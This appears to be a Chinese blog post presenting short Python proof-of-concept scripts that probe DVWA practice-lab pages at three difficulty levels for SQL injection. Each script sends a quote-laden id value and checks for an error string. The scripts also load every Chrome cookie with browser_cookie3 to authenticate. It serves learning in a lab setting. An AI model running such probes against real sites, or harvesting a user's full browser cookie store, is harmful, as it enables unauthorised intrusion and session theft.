POC——DVWA‘s SQL Injection

最近开始尝试着自己写一些POC，从基础的DVWA靶场开始吧，不定时更新~

Level——low:

import requests
import browser_cookie3

cookie = browser_cookie3.chrome()  //获得了chrome全部的访问过的cookie，以后看看有没有什么方法只获取当前的，而且这个方法好像只有chrome可以，firefox不太行
response = requests.get("http://192.168.117.133/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie)

re = 'syntax'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

Level——Medium

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}　　//这里因为Content-Type:application/x-www-form-urlencoded，所以post构造为该模式（根据Payload内的值）
 6 response = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/?id=1'&Submit=Submit#",cookies=cookie,data=datas)
 7 
 8 re = 'syntax'
 9 flag=re in str(response.content)
10 
11 if flag:
12     print("It looks likely vulnerable")
13 else:
14     print("It is strong")

Level——High

 1 import requests
 2 import browser_cookie3
 3 
 4 cookie = browser_cookie3.chrome()
 5 datas = {"id":"1'","Submit":"Submit"}
 6 response1 = requests.post("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/session-input.php",cookies=cookie,data=datas)
 7 response2 = requests.get("http://192.168.117.130/DVWA-1.9/vulnerabilities/sqli/",cookies=cookie)　　//high中，查询和回显不在一个页面中，所以在这里分post查询和get获取页面
 8 
 9 re = 'wrong'　　//这里换了特征语句
10 flag=re in str(response2.content)
11 
12 if flag:
13     print("It looks likely vulnerable")
14 else:
15     print("It is strong")